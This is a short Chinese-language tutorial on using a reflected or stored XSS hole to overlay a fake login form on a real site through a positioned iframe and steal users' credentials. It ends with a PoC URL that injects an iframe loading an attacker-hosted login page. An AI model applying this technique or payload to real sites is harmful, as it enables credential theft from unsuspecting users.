利用XSS漏洞进行网络钓鱼攻击

前提：页面http://www.example.com/login?x=……存在一处反射式XSS漏洞

目的：获取http://www.example.com/login的用户登录信息

通过XSS漏洞，构造钓鱼页面，获取用户登录信息：

1 构造钓鱼页面，其中包括用户名输入，密码输入，提交按钮。

2 使用<iframe>包含钓鱼页面，塞入XSS漏洞处进行模块覆盖。

其中1中构造比较简单，看登录程序流程设计，可用户名和密码偷走入库与真实提交登录同时进行，当然也可以加些跳转语句等。总之就是让用户看来提交顺利，并无异常，以免用户怀疑。

真正的技巧在于2上，传统的钓鱼网站一般是域名和页面都是独立的，且极力做到和被钓鱼网站相似。而如何使用一个XSS来进行钓鱼。这里的XSS可以是反射式也可以是存储式。<iframe>的设计要有些讲究，钓鱼的精髓之一就是美工，这样假与真才不好分辨。对于可见的<iframe>标签，样式控制和自身属性足以达到让“内部框架“与邻近的内容相融合。使用样式控制精确定位，使钓鱼页面的输入控件覆盖被钓鱼页面的输入控件，来达到数据劫持的效果。这看似极为像Clickjacking攻击模式，只是Clickjacking攻击的特点是<iframe>是为了不让用户看到，而在这里我们恰恰是为了让用户看到<iframe>中的内容。

对于模块覆盖，这种劫持范围可大可小，小到输入框，大到整个浏览器。

POC：http://www.victim.com/login?x=<iframe src=http://www.attacker.com/login style=" width: 500px; top:100px; left:300px; overflow:hidden; position:absolute;" frameborder=0>

标签分类：